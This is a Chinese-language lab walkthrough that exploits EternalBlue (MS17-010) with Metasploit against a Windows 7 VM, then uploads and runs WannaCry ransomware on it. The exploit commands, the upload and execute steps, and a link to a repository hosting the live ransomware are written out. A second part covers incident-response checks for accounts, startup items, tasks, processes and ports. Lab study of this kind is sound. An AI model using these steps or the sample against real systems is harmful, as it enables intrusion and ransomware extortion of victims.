admin 管理员组文章数量: 887007
攻击机kali:192.168.83.136
靶机win7:192.168.83.144
注意开始攻击前要设置快照
一、漏洞复现
1.启动msf
简介:
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
msfconsole
2.搜索相关模块
永恒之蓝模块 命令:
search ms17-010
使用永恒之蓝攻击利用攻击模块
命令:
use exploit/windows/smb/ms17_010_eternalblue
3.配置参数
命令:
options
rhosts要求填写,目标主机的IP 192.168.83.144(靶机)
命令:
set rhosts 192.168.83.144
添加成功后再次options查看配置
4.开始攻击
命令:
run
开始利用漏洞模块攻击
获得目标主机权限
上面就是对msf17-010的使用,可以对win7进行操作
可以获取命令端口 shell
和其他的一些简单操作
后面的操作可以看这个师傅的
网络安全入门第一课—永恒之蓝(ms17-010)_ms17-010永恒之蓝-CSDN博客https://blog.csdn/m0_56088051/article/details/131682772?ops_request_misc=%7B%22request_id%22%3A%22171317287016777224471297%22%2C%22scm%22%3A%2220140713.130102334..%22%7D&request_id=171317287016777224471297&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~top_positive~default-1-131682772-null-null.142%5Ev100%5Epc_search_result_base5&utm_term=%E6%B0%B8%E6%81%92%E4%B9%8B%E8%93%9Dms17-010&spm=1018.2226.3001.4187
5.上传病毒
病毒样本链接
GitHub - limiteci/WannaCry: this repository contains the active DOS/Windows ransomware, WannaCrythis repository contains the active DOS/Windows ransomware, WannaCry - limiteci/WannaCryhttps://github/limiteci/WannaCry
把病毒样本的其中两个文件放到一个文件夹中,我这里放到的是text文件夹中
上传病毒样本
命令:
upload /home/kali/Desktop/text/wcry.exe
命令:
pwd
查看上传路径
命令:
execute -f wcry.exe
执行wcry.exe
命令:
ps -ef | grep wcry.exe
查看是否执行成功
登录win7靶机查看到了病毒上传成功
下面的是执行成功的win7桌面
原本的文件内容被加密了
发现被勒索了
防护措施
首先关闭网络接着恢复快照
二、应急响应--事件排查
1.判断勒索家族种类
一般被加密后加密文档都存在一定的后缀,可以将改后缀上传到国内的勒索病毒平台分析,会给出相关的样本家族,以及少部分会提供有解密方案,但是大多数情况下难以解决
网址:
安全卫士勒索病毒专题:文件恢复_安全卫士离线救灾版_文档卫士https://lesuobingdu.360/
2.系统信息
//可以显示本地计算机的硬件资源、组件、软件环境、正在运行的任务、服务、系统驱动程序、加载模块、启动程序等。
C:\Users\test>msinfo32 //Microsoft系统信息工具:Msinfo32.exe
C:\Users\test>systeminfo //可查看主机名、操作系统等版本信息。
3.用户信息
攻击者入侵服务器后,可能会通过创建账号对服务器进行远程控制。常见的创建账号方法有:创建新账号、激活默认账号、建立隐藏账号(用户名后跟$的为隐藏账号)。
排查恶意账号的方法如下,如果存在恶意账号删除或者禁用:
C:\Users\test>net user //查看所有用户,此方法无法查看隐藏用户
C:\Users\test>net user username //查看指定用户信息
C:\Users\test>wmic useraccount get name,SID //查看用户信息
C:\Users\test>lusrmgr.msc
4.启动项
启动项是系统开机时在前台或者后台运行的程序,攻击者有可能通过启动项使用病毒后门等实现持久化控制。
排查启动项的方法如下:
C:\Users\test>msconfig //命令行打开启动项
5.计划任务
查看计划任务属性,查看是否存在木马文件等。
C:\Users\test>taskschd.msc //获取计划任务信息
C:\Users\test>schtasks //获取计划任务信息(用户需是administrators组成员)
或直接打开计算机管理-->系统工具-->计划任务程序
6.服务自启动
//查看服务类型和启动状态,查看是否存在异常服务
C:\Users\test>services.msc
三、进程、端口排查
1、进程排查
主机在感染恶意程序时,都会启动相应进程来完成恶意操作。
排查方法如下:
C:\Users\test>msinfo32 软件环境-->正在运行任务
2.端口排查
主要对端口的连接情况进行检查,排查是否存在远程连接、可疑连接。检查方法如下:
//查看目前的网络连接,定位可疑的ESTABLISHED
C:\Users\test>netstat -ano 或。 C:\Users\test>netstat -anb(需要管理员权限)
//根据netstat定位出的pid,通过tasklist命令进行进程定位
C:\Users\test>tasklist | findstr pid
//查看端口对应的PID
C:\Users\test>netstat -ano | findstr port
版权声明:本文标题:利用永恒之蓝漏洞(ms17-010)对win7上传勒索病 内容由网友自发贡献,该文观点仅代表作者本人, 转载请联系作者并注明出处:http://www.freenas.com.cn/jishu/1731878541h1509834.html, 本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌抄袭侵权/违法违规的内容,一经查实,本站将立刻删除。
发表评论